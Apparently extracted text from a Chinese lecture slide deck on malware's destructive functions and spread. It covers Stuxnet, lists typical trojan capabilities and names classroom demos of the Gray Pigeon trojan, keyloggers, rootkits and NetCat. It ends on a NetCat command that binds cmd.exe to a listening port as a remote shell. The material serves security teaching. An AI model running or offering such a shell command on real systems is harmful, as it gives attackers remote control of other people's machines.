第二讲 恶意软件的典型破坏功能与传播途径.pptVIP

Stuxnet 这是第一个直接破坏现实世界中工业基础设施的恶意代码。 据赛门铁克公司的统计，目前全球已有约45000个网络被该蠕虫感染，其中60%的受害主机位于伊朗境内。 伊朗政府已经确认该国布什尔核电站遭到Stuxnet蠕虫的攻击。 传播方式 Stuxnet的特点 专门攻击工业系统 利用多个零日漏洞 使用数字签名 ?明确的攻击目标 伊朗核设施 这是一次精心策划的攻击！ 伪装RealTek的数字签名以躲避杀毒软件的查杀。 灰鸽子远程控制性木马演示 2.3.1目前病毒程序常见的功能 盗取各类用户名和密码（包括：邮箱、聊天工具、论坛） 窃取各类私密文档 窃取网络游戏装备 控制目标主机 监控对方屏幕操作、侵犯目标系统隐私 监听窃视（麦克风、摄像头） 目前病毒程序常见的功能（续） 窃取网银、股票交易系统账户 发送垃圾邮件 盗取个人信息 发展僵尸网络客户端 瘫痪目标系统 破坏目标系统数据 渗透到其他计算机 实施军事或政治目的 …… 2.3.2实例演示 灰鸽子木马程序功能视频播放 Radmin远程控制工具演示 KeyLogger演示 Rootkit隐藏演示 Nc、Cshell远程控制工具演示 1.灰鸽子 2.Radmin 3.Keylogger 4.NC/cshell.exe NetCat：通用的网络连接工具 用法一： nc –l –p 5000 –e cmd.exe nc